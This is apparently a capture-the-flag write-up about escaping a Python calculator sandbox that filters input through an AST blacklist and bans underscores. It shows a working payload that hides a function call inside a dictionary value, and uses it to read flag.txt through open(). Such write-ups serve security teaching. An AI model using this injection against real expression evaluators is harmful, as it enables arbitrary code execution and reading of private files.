Let's have a look at the source code

So we can see that anything from the data types: `List`, `Tuple`, `Set`, `Dict`, `Name`, `UnaryOp`, `BinOp`, `Call`, `Attribute` is subject to checks whether the code is "safe".

The blacklist is essentially an Abstract Syntax Tree (AST) along with `_` being blocked. So we need to get code execution without using underscores, as well as acquiescing to the various restrictive checks of the program.

We can attempt to embed a call within a dictionary

```py
root@4031c6fd560f:~# python util.py
Welcome to SafetyCalc (tm)!
Note: SafetyCorp are not liable for any accidents that may occur while using SafetyCalc
> {"flag": print("hello")}
hello
{'flag': None}
```

This has caused the program to execute the code in the dictionary value. (it is worth noting, this program would also return our dictionary key).

From here,we can move to code execution. We can call the open function.

```py
> {'flag':print(open())}
Something bad happened! open() missing required argument 'file' (pos 1)
>
```

So we can read the flag.

```py
> {'flag':print(open("flag.txt", "r").readline())}
```